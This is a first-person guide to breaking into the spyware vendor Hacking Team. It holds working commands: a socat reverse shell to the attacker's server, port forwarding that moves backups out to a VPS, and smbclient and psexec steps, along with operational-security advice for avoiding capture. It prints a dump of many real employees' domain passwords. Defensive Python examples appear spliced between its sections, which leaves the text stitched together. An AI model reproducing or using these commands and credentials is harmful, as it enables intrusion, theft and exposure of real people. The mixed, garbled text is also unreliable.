Anon Warrior DIY Guide To Hacking Part 2 . . . How I Hacked the Hacking Team


–[ 1 – Introduction ]–

The world already has books, audio books, guides, and information about hacking. In the world there are many better hackers than I, but unfortunately they squander their skills working for “defense” contractors, for intelligence agencies, to protect banks and corporations, and to uphold the established order. The hacker culture was born in the USA as a Counterculture, but that origin has remained in mere aesthetics – the rest has been assimilated. At least they can wear a T-shirt, dye their hair blue, use their hacker nicknames, and feel rebellious while working for the globalist system.

Before, someone had to sneak into offices to leak documents. A gun was needed to rob a bank. Today you can do it from bed with a laptop in your hands. As the CNT said after the Gamma Group hack: “we will try to take further steps with new forms of security.” Hacking is a powerful tool; let us learn and fight back!

  1. http://pastebin.com/raw.php?i=cRYvK4jb
  2. https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  3. http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  4. https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  5. http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

–[ 2 – Hacking Team ]–

I hacked Hacking Team because it was a company that helped governments hack and spy upon journalists, activists, political opponents, and any other threat to their power:

  1. http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  2. http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  3. http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  4. https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  5. https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  6. https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  7. http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  8. http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  9. https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  10. http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  11. http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

And, from time to time, criminals and terrorists:

http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

Vincenzetti, the CEO, liked to finish his emails with the fascist slogan “boia chi molla”. It would be more accurate to say “boia chi vende RCS”. They also claimed to have technology to solve the “problem” of Tor and the Darknet:

http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

But since I still have my freedom, I have my doubts about its effectiveness.

–[ 3 – Be Careful Out There ]–

Unfortunately, our world is upside down. It enriches you by doing bad things and imprisons you for doing good things. Fortunately, thanks to the hard work of people like those of “Tor project”, you can avoid being thrown in jail if you follow a few simple guidelines:

1)   Encrypt your hard drive;

https://info.securityinabox.org/es/chapter-4

I guess that by the time the police arrive to seize your computer, it means you have already made many mistakes, but prevention is better than cure.

2) Use a virtual machine and route all of its traffic through Tor. This accomplishes two things. First, all connections are anonymous, going to and through the Tor network. Second, keeping your personal life and your anonymous life on different computers helps you not to mix them up by accident.

You can use programs like:

Here is a detailed comparison:

https://www.whonix.org/wiki/Comparison_with_Others

3) (Optional) Do not connect directly to the Tor network. Tor is not a panacea. The hours you are connected to Tor can be correlated with the hours your hacker nickname is active. There have also been successful attacks against the network. You can connect to the Tor network through something other than your own connection; Wifislax is a linux distribution with many wifi tools. Another option is to connect to a VPN or a bridge node before Tor, but it is less safe, because the hacker's activity can still be correlated with the internet activity of your house (this, for example, was used as evidence against Jeremy Hammond).

The reality is that although Tor is not perfect, it works quite well. When I was young and reckless, I did many things (hacking, I mean) with no protection other than Tor, things that the police did investigate, and I have never had any problems.

–[ 3.1 – Infrastructure ]–

I do not hack directly from Tor exit relays. They are blacklisted, very slow, and cannot receive reverse connections. Tor protects my anonymity while I connect to the infrastructure I use for the actual hacking, which consists of:

  1. Domain names: For command and control (C&C) addresses, and for DNS tunnels as a guaranteed egress path.
  2. Stable servers: For C&C servers, for receiving reverse shells, for launching attacks, and for storing the loot.
  3. Hacked servers: They serve as pivots to hide the IP addresses of the stable servers, and for when I want a fast connection without a pivot, for example port scanning, scanning the whole internet, or downloading a database through SQL injection.

Obviously you have to pay anonymously with something like Bitcoin (if you use trackable currency watch out).

–[ 3.2 – Attribution ]–

It often comes out in the news that an attack has been attributed to a group of government hackers because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, email, etc). Government hackers are careless and sloppy because they can hack without legal consequences.

I did not want to make the police's work easier by linking the Hacking Team hack with the hacks and nicknames of my daily work as a black hat hacker. So I used new servers and domains, registered with new emails and paid for with new, unused bitcoin addresses. Also, I used only public tools and things I wrote specifically for this attack, and I changed my way of doing some things so as not to leave my usual forensic footprint or MO.

–[ 4 – Gathering Information ]–

Although it can be tedious, this stage is very important, because the larger the attack surface, the easier it is to find a flaw somewhere in it.

–[ 4.1 – Technical Information ]–

Some tools and techniques are:

  • Google: You can find many unexpected things with a couple of searches, for example the identity of DPR. The bible of how to use Google to hack is the book “Google Hacking for Penetration Testers”.
  • Subdomain enumeration: Often a company's main domain is hosted by a third party, and you can find the company's own IP ranges thanks to subdomains like mx.company.com or ns1.company.com. In addition, sometimes there are things that should not be exposed on “hidden” subdomains. Useful tools for discovering domains and subdomains are fierce, theHarvester, and recon-ng.

  • Reverse whois: With a reverse lookup using the whois information of a company's domain or IP range, you can find more of their domains and IP ranges. As far as I know, there is no free way to do reverse whois lookups, apart from a hack with google:

“Via della moscova 13” site:www.findip-address.com
“Via della moscova 13” site:domaintools.com

  • Port scanning and fingerprinting: Unlike the other techniques, this talks to the company's servers. I include it in this section because it is not an attack, only information gathering. The company's IDS may generate an alert for the port scan, but you do not have to worry, because the whole internet is being scanned constantly. For scanning and fingerprinting, nmap is the tool. For companies with very large IP ranges, zmap or masscan are faster. WhatWeb and BlindElephant can fingerprint websites.

–[ 4.2 – Social Information ]–

For social engineering, it is very useful to gather information about the employees, their roles, contact information, operating systems, browser, plugins, software, etc. Some helpful public resources are:

  • Google: Here too, it is the most useful information gathering tool.
  • theHarvester and recon-ng: I already mentioned them in the previous section, but they have much more functionality. You can find a lot of information quickly, and it's automated. It is worth reading all the documentation that comes with the software.
  • LinkedIn: You can find a lot of information about employees here. The company's recruiters are the most likely to accept your connection requests.
  • Data.com: Formerly known as jigsaw. It has a lot of contact information for employees.
  • File metadata: Lots of information about employees and their systems can be found in the metadata of files the company has published. Useful tools for finding files on the company website and extracting the metadata are metagoofil and FOCA.

— [ 5 – Entering the Network ] —

There are several ways to get a foothold inside a network. Since the method I used for Hacking Team is very uncommon and much more laborious than is normally required, I am going to talk a little about the two most common methods, which I recommend trying first.

— [ 5.1 – Social Engineering ] —

Social engineering, specifically spear phishing, is responsible for the most hacks today.

  1. An introductory course on spear phishing and its notes.
  2. Read “Targeted Attacks” for fun anecdotes of social engineering across different generations.

I did not want to try spear phishing against Hacking Team because their business is to help governments spear phish their opponents, so there was a much higher risk that Hacking Team would recognize and investigate any attempt to spear phish them.

— [ 5.2 – Buy Access ] —

Thanks to hard-working Russians and their exploit kits, traffic sellers, and bot herders, many companies already have compromised computers inside their networks and don't even know it. Almost every Fortune 500 company, with its huge security budget, already has bots inside its network. However, Hacking Team is a very small company, and most of its employees are computer security experts, so there was very little chance that they were already compromised.

— [ 5.3 – Technical Exploitation ] —

After the Gamma Group hack, I described a process for finding vulnerabilities.

Hacking Team had a public IP range:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike Gamma Group, Hacking Team's customer service site required a client certificate to connect. What I had was the main website (a Joomla blog in which joomscan found no serious flaws), a mail server, a pair of routers, two VPN devices, and a spam-filtering appliance. So I had three options: look for a 0day in Joomla, look for a 0day in Postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed the most achievable option, and after two weeks of reverse engineering work, I had a remote root exploit. Since the vulnerabilities have still not been patched, I will not give more details.

For more information on how to look for these types of vulnerabilities read:

  1. http://www.devttys0.com/
  2. https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

— [ 6 – Being Prepared ] —

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware and compiled several post-exploitation tools for the embedded device. The backdoor serves to protect the exploit: using the exploit only once and then returning through the backdoor makes it much harder to discover and patch. The post-exploitation tools I had prepared were:

  1. busybox: For all the common UNIX utilities that the system did not have.
  2. nmap: To scan and fingerprint Hacking Team's internal network.
  3. Responder.py: The most useful tool for attacking Windows networks when you have access to the internal network but do not have a domain user.
  4. Python: To run Responder.py.
  5. tcpdump: To sniff traffic.
  6. dsniff: To sniff passwords from weak protocols such as ftp, and to do arp spoofing. I wanted to use ettercap, written by ALoR and NaGA of Hacking Team themselves, but it was difficult to compile it for the system.
  7. socat: For a comfortable shell with a pty. On my server: socat file:`tty`,raw,echo=0 tcp-listen:my_port. On the hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:my_server:my_port. And for many other things; it is a Swiss army knife. See the examples section of its documentation.
  8. screen: Like socat's pty, it is not strictly necessary, but I wanted to feel at home in Hacking Team's network.
  9. A SOCKS proxy server: To use together with proxychains to access the internal network from any other program.
  10. tgcd: To forward ports, such as the SOCKS server's, through the firewall.

The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network.

— [ 7 – Watch and Listen ] —

Once inside Hacking Team's internal network, I wanted to take a look around and think before taking another step. I ran Responder.py in analysis mode (-A, to listen without interfering) and did a slow scan with nmap.

— [ 8 – NoSQL Databases ] —

NoSQL, or rather NoAuthentication, has been a great gift to the hacker community. Just when I was worried that they had finally patched all the MySQL authentication bypass bugs [3] [4] [5], new databases without authentication come into fashion. Nmap found a few on Hacking Team's internal network:

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072

|_  version = 2.6.5

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases

|_  version = 2.6.5

They were the test databases for RCS. The audio that RCS records is stored in MongoDB with GridFS. The audio folder in the torrent comes from there. They were spying on themselves without meaning to.

— [ 9 – Crossed Cables ] —

Although it was fun listening to Hacking Team's recordings and viewing webcam images of them developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened the doors. According to their documentation, their iSCSI devices were supposed to be on a separate network, but nmap found some in their subnet 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
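Both of the scan findings in sections 8 and 9 have the same defensive reading: a storage service answered without being asked for credentials. The Python below is an added example, not part of the original writeup or of any tool it names. It parses nmap's normal-format output and flags the two shapes shown above: a mongodb-databases result with "ok = 1" (listDatabases succeeded, and the scan supplied no credentials) and an iscsi-info result reporting "No authentication required". The scan text is a constructed sample with placeholder hosts and addresses; the field names follow nmap's own script output.

```python
"""Flag services that an nmap scan reports as reachable without authentication.

Added example, not from the original writeup. The scan text below is a
constructed sample (placeholder hosts and addresses) in nmap's normal output
format, shaped like the MongoDB and iSCSI findings described in the text.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for db-test.example.local (10.10.20.5)
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_  version = 2.6.5

Nmap scan report for nas-backup.example.local (10.10.20.72)
PORT     STATE SERVICE VERSION
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-backup.name
|     Address: 10.10.20.72:3260,0
|_    Authentication: No authentication required

Nmap scan report for nas-secure.example.local (10.10.20.73)
PORT     STATE SERVICE VERSION
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-secure.name
|     Address: 10.10.20.73:3260,0
|_    Authentication: CHAP required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+) \(([\d.]+)\)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")


def parse_nmap(text):
    """Return one dict per open port: host, ip, port, service and the NSE script lines under it."""
    entries = []
    host = ip = None
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, ip = m.groups()
            current = None
            continue
        m = PORT_RE.match(line)
        if m:
            current = {"host": host, "ip": ip, "port": int(m.group(1)),
                       "service": m.group(3), "script": []}
            entries.append(current)
            continue
        # NSE script output lines are prefixed with "|" (the last one with "|_").
        if current is not None and line.startswith("|"):
            current["script"].append(line.lstrip("|_ ").strip())
    return entries


def find_unauthenticated(text):
    """Return (ip, port, reason) for every service that served data without credentials."""
    findings = []
    for e in parse_nmap(text):
        script = "\n".join(e["script"])
        # "ok = 1" means listDatabases succeeded; the scan sent no credentials.
        if e["service"] == "mongodb" and "ok = 1" in script:
            findings.append((e["ip"], e["port"], "MongoDB listed databases without credentials"))
        # iscsi-info reports the target's authentication policy verbatim.
        if e["service"].startswith("iscsi") and "No authentication required" in script:
            findings.append((e["ip"], e["port"], "iSCSI target exposes its LUNs without CHAP"))
    return findings


if __name__ == "__main__":
    for ip, port, reason in find_unauthenticated(SAMPLE_NMAP_OUTPUT):
        print(f"{ip}:{port}  {reason}")
```

Run this over your own internal scans rather than the sample, and treat each hit as an inventory defect: MongoDB needs authorization enabled and a bind address that is not the whole LAN, and an iSCSI target needs CHAP plus the separate storage network that Hacking Team's own documentation already called for.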

iSCSI needs a kernel module, and it would have been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iscsiadm finds the target name iqn.2000-01.com.synology, but has problems mounting it because it thinks the address is 192.168.200.72 instead of 127.0.0.1.

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

… the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

And then I found backups of several virtual machines. The Exchange server seemed the most interesting. It was too big to download, but we can mount it remotely and look for interesting files like this:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

So the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

Now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311

we find the virtual machine's hard disk, and we mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

… and finally we have unpacked the Russian doll and can see all the files of the old Exchange server in /mnt/part1

https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
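The Russian doll above turns on one number: the partition's byte offset for losetup, which the text works out by hand as 2048 * 512. The Python below is an added example, not code from the writeup, that reads that offset from the image's MBR partition table and emits a read-only losetup line, the routine an incident responder mounting a backup image for inspection wants instead of hand arithmetic. The MBR bytes are constructed here to mirror the fdisk line shown above; the 512-byte sector size is an assumption (a 4K-sector image needs the other value), and a protective MBR is refused because the real table then lives in the GPT.

```python
"""Compute losetup offsets from an MBR partition table.

Added example, not from the original writeup. The 512-byte MBR below is
constructed to match the fdisk line in the text (one NTFS partition starting
at LBA 2048); a 512-byte sector size is assumed.
"""
import struct

SECTOR_SIZE = 512
MBR_SIGNATURE = b"\x55\xaa"
# Partition-type bytes that matter most when triaging backup images.
TYPE_NAMES = {0x07: "HPFS/NTFS/exFAT", 0x0b: "FAT32", 0x0c: "FAT32 (LBA)",
              0x83: "Linux", 0xee: "GPT protective MBR"}
# One 16-byte entry: status, CHS start, type, CHS end, LBA start, sector count.
ENTRY_FMT = "<B3sB3sII"


def build_sample_mbr():
    """Construct a minimal MBR with a single NTFS partition (constructed test data)."""
    mbr = bytearray(512)
    # Start 2048, end 1258287103 -> 1258285056 sectors, as in the fdisk output above.
    mbr[446:462] = struct.pack(ENTRY_FMT, 0x00, b"\0\0\0", 0x07, b"\0\0\0", 2048, 1258285056)
    mbr[510:512] = MBR_SIGNATURE
    return bytes(mbr)


def parse_mbr(mbr, sector_size=SECTOR_SIZE):
    """Return a list of dicts describing the non-empty primary partitions."""
    if len(mbr) < 512 or mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("no 0x55AA signature: not an MBR (or a raw partition image)")
    partitions = []
    for index in range(4):
        offset = 446 + 16 * index
        status, _, ptype, _, lba_start, sectors = struct.unpack(ENTRY_FMT, mbr[offset:offset + 16])
        if ptype == 0 or sectors == 0:
            continue  # empty slot
        partitions.append({
            "index": index + 1,
            "type": ptype,
            "type_name": TYPE_NAMES.get(ptype, f"unknown (0x{ptype:02x})"),
            "bootable": status == 0x80,
            "lba_start": lba_start,
            "sectors": sectors,
            "byte_offset": lba_start * sector_size,
            "byte_size": sectors * sector_size,
        })
    return partitions


def losetup_command(part, image, loop="/dev/loop1"):
    """Build a read-only losetup line for one partition; -r keeps the evidence unmodified."""
    if part["type"] == 0xEE:
        raise ValueError("protective MBR: the real table is the GPT at LBA 1")
    return (f"losetup -r -o {part['byte_offset']} "
            f"--sizelimit {part['byte_size']} {loop} {image}")


if __name__ == "__main__":
    for part in parse_mbr(build_sample_mbr()):
        print(part["index"], part["type_name"], part["byte_offset"])
        print(losetup_command(part, "/dev/loop0"))
```

Feed parse_mbr the first 512 bytes of the flat image (the same bytes fdisk reads) and pass the resulting command through a read-only mount; the --sizelimit keeps the loop device from spilling past the partition into whatever follows it in the image.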

— [ 10 – Domain Admin From Backups ] —

What interested me most about the backups was finding a password or hash that could be used to access the live server. I used pwdump, cachedump, and lsadump on the registry hives. lsadump found the password of the besadmin service account:

_SC_BlackBerry MDS Connection Service
0000  16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0010  62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00  b.e.s.3.2.6.7.8.
0020  21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00  !.!.!...........

I used proxychains with the SOCKS server on the embedded device, together with smbclient, to check the password:
proxychains smbclient //192.168.100.51/c$ -U 'hackingteam.local/besadmin%bes32678!!!'

It works! The besadmin password was still valid, and it was a local admin. I used my proxy and metasploit's psexec_psh to get a meterpreter session. Then I migrated to a 64-bit process, ran “load kiwi” and “creds_wdigest”, and I had many passwords, including the Domain Administrator's:

HACKINGTEAM BESAdmin bes32678 !!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <—- sysadmin go!
HACKINGTEAM m.romeo Iolkos / (90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM D.Martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A! E $$ andra
HACKINGTEAM m.bettini Ettore & Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set! Dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f @ #
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571 & 2E
HACKINGTEAM e.rabe erab @ 4HT!

— [ 11 – Downloading the Mail ] —

Now that I had the domain administrator's password, I had access to the heart of the company. Since every step I take is a risk of detection, I downloaded their email before exploring further. Powershell makes it easy. Interestingly, I found a bug in its date handling. After getting the mail, it took a couple more weeks to get the source code, so I went back from time to time to download any new emails. The server was Italian, with dates in day/month/year format:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

for New-MailboxExportRequest to download new emails (in this case, mail since June 5). The problem was that it says the date is invalid if the day is greater than 12 (I guess this is because in the US they use the month first, and the month can't be a number greater than 12). It seems Microsoft's engineers still only test their software with their own regional settings.
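The bug described above is a locale-dependent parse: the same string "05/06/2015" is June 5 under an Italian day/month reading and May 6 under a US month/day reading, and "13/06/2015" is simply rejected by the latter. The Python below is an added example, not from the writeup and not Exchange's own code, that reproduces both readings and shows the defensive habit that sidesteps the problem: anything that becomes a filter accepts only ISO 8601 dates. The culture tags are just labels for the two format strings; the cmdlet's own parser is not modelled.

```python
"""Reproduce a day/month versus month/day parsing ambiguity and its fix.

Added example, not from the original writeup. The two format strings stand
in for an Italian and a US regional setting; the Exchange cmdlet's own
parsing is not modelled here.
"""
from datetime import datetime

SLASH_FORMATS = {
    "it-IT": "%d/%m/%Y",  # day first, as on the Italian server in the text
    "en-US": "%m/%d/%Y",  # month first, which rejects any day above 12
}


def parse_slash_date(text, culture):
    """Parse a dd/mm/yyyy or mm/dd/yyyy string under the given regional setting."""
    return datetime.strptime(text, SLASH_FORMATS[culture]).date()


def readings(text):
    """Return how each regional setting reads the string; None where it is rejected."""
    result = {}
    for culture in SLASH_FORMATS:
        try:
            result[culture] = parse_slash_date(text, culture)
        except ValueError:
            result[culture] = None
    return result


def is_ambiguous(text):
    """True when both settings accept the string but disagree about the date."""
    r = readings(text)
    return None not in r.values() and len(set(r.values())) > 1


def parse_filter_date(text):
    """Accept only ISO 8601 (YYYY-MM-DD), which every regional setting reads the same way."""
    try:
        return datetime.strptime(text, "%Y-%m-%d").date()
    except ValueError:
        raise ValueError(f"filter dates must be YYYY-MM-DD, got {text!r}") from None


if __name__ == "__main__":
    for sample in ("05/06/2015", "13/06/2015"):
        print(sample, readings(sample), "ambiguous" if is_ambiguous(sample) else "")
    print(parse_filter_date("2015-06-05"))
```

The silent case is the dangerous one: "13/06/2015" fails loudly, but "05/06/2015" parses under both settings and quietly moves the filter by a month, which for an export job means a month of mail either missing or duplicated. Validating against the ISO form before the string reaches the cmdlet turns that into a visible error.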

— [ 12 – Downloading Files ] —

Now that I was domain admin, I also started downloading the shares using my proxy and smbclient's -Tc option, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent.

— [ 13 – Introduction to Windows Domain Hacking ] —

Before continuing to tell the story of the culiac weones, I should say something about how to attack Windows networks.

— [ 13.1 – Lateral Movement ] —

I will give a brief review of the techniques for spreading within a Windows network. The remote execution techniques require the password or hash of a local administrator on the target. By far the most common way to obtain such credentials is to use mimikatz, above all sekurlsa::logonpasswords and sekurlsa::msv, on computers where you already have administrative access. The in situ movement techniques also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp and bypassuac.

Remote movement:

  1. psexec: The most basic and most proven way of moving through windows networks. You can use psexec, winexe, metasploit's psexec_psh, powershell empire's invoke_psexec, or the windows command “sc”. For metasploit, powershell empire, and pth-winexe, it is enough to know the hash without knowing the password. It is the most universal way (it works on any computer with port 445 open), but also the least cautious, because of the 7045 “Service Control Manager” event it leaves in the system log. In my experience, it has never gotten a hacker detected, but sometimes they notice it later, and it helps investigators understand what the hacker did.
  2. WMI: The most cautious way. The WMI service is enabled on all Windows computers, but, except on servers, the firewall blocks it by default. You can use wmiexec.py, pth-wmis (here is a demonstration of wmiexec and pth-wmis), powershell empire's invoke_wmi, or the windows command wmic. All except wmic only need the hash.
  3. PSRemoting: It is disabled by default, and I do not advise enabling new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything; it will change with powershell 5 and Windows 10, but today powershell makes it easy to do everything in RAM, dodge antivirus, and leave very few footprints).
  4. Scheduled tasks: You can run programs remotely with schtasks. It works in the same situations as psexec, and also leaves known traces.
  5. GPO: If all the above protocols are disabled or blocked by the firewall, then once you are domain admin you can use GPO to give yourself a logon script, install an msi, or run a scheduled task; or, as we will see with the computer of Mauro Romeo (Hacking Team sysadmin), enable WMI and open the firewall through GPO.
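The trace that item 1 mentions is System log event 7045 (Service Control Manager: a service was installed), which is what an investigator later reads to reconstruct psexec-style movement. The Python below is an added example, not part of the writeup or of any tool it names: a detection pass over 7045 records that flags the shapes those tools leave behind, namely Sysinternals' PSEXESVC, a service binary pulled from an ADMIN$ share, an encoded PowerShell command line as the service image, and a random eight-letter service name. The event records are constructed samples using 7045's real EventData field names; hosts and addresses are placeholders, and the random-name rule is a heuristic that will need tuning against a real environment's baseline.

```python
"""Flag Event ID 7045 service installs with the shape of remote-execution tooling.

Added example, not from the original writeup. The records below are
constructed samples that mirror the EventData fields of System log event
7045 (ServiceName, ImagePath, StartType, AccountName); hosts are placeholders.
"""
import re

SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS-01.example.local", "ServiceName": "Windows Update Agent",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WS-02.example.local", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "SRV-FILE.example.local", "ServiceName": "kQxTwLpZ",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgA",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "SRV-FILE.example.local", "ServiceName": "bTcRmiSc",
     "ImagePath": r"\\10.10.20.5\ADMIN$\bTcRmiSc.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "WS-01.example.local", "ServiceName": "Print Spooler",
     "ImagePath": "", "StartType": "", "AccountName": ""},  # state change, not an install
]

RANDOM_NAME_RE = re.compile(r"[A-Za-z]{8}")
ENCODED_PS_RE = re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)


def service_install_reasons(event):
    """Return the list of reasons a 7045 record looks like remote-execution tooling."""
    if event.get("EventID") != 7045:
        return []
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "")
    reasons = []
    if name.upper() == "PSEXESVC" or "PSEXESVC" in image.upper():
        reasons.append("Sysinternals PsExec service")
    if image.startswith("\\\\") or "ADMIN$" in image.upper():
        reasons.append("service binary loaded from an admin share")
    if ENCODED_PS_RE.search(image):
        reasons.append("encoded PowerShell service command")
    # Heuristic: fixed-length mixed-case random names are a default in some tooling.
    if RANDOM_NAME_RE.fullmatch(name) and name != name.lower() and name != name.upper():
        reasons.append("random-looking eight-letter service name")
    return reasons


def detect_suspicious_service_installs(events):
    """Run every record through the rules; keep those with at least one reason."""
    hits = []
    for event in events:
        reasons = service_install_reasons(event)
        if reasons:
            hits.append({"Computer": event["Computer"], "ServiceName": event["ServiceName"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_suspicious_service_installs(SAMPLE_EVENTS):
        print(hit["Computer"], hit["ServiceName"], "; ".join(hit["reasons"]))
```

In practice the records come from the System log of every host, shipped centrally, and the value of the rule is the timeline it yields: the first 7045 on a machine that never installs services, followed by the same shape on the next machine, is the lateral path the text describes, read from the defender's side.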

In situ movement within a network:

  1. Impersonating tokens: Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools to do this are incognito and Mimikatz's token::* commands.
  2. MS14-068: You can learn how to take advantage of a validation flaw in kerberos to generate a domain administrator ticket here, here, or here.
  3. Pass the hash: If you have a user's hash but the user is not logged in, you can use sekurlsa::pth to get a ticket for that user.
  4. Process injection: Any RAT can be injected into another process, for example with the migrate command in meterpreter and pupy, or psinject in powershell empire. You can inject into the process that has the token you want.
  5. runas: This is sometimes very useful because it does not require admin. The command is part of windows, but if you do not have an interactive session you can use powershell.

— [ 13.2 – Persistence ] —

Once you have access, you want to keep it. Really, “persistence” is a challenge only for motherfuckers like Hacking Team. To hack businesses there is no need for persistence, because companies never sleep. I always use “persistence” Duqu 2 style: running in RAM on a couple of servers with high uptime. In the hypothetical case that they all restart at once, I have passwords and a golden ticket as backup access. You can read more about persistence mechanisms for windows here, here, and here. But for hacking businesses there is no need, and it increases the risk of detection.

— [ 13.3 – Internal Recognition ] —

The best tool today for understanding Windows networks is Powerview. It is worth reading everything written by its author: here first, then this, this, this, and finally this. Powershell itself is also very powerful. As there are still many Server 2003 and 2000 machines without powershell, you will have to learn the old-school way too, with tools such as netview.exe or the windows command “net view”. Other techniques that I like to use are:

  1. Download a list of file names: With a domain administrator account, you can download the names of all the files on the network with powerview: Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | select-string '^(.*) \t' | %{dir -recurse $_.Matches[0].Groups[1] | select fullname | out-file -append files.txt}. Later, you can read it at your own pace and choose which files you want to download.
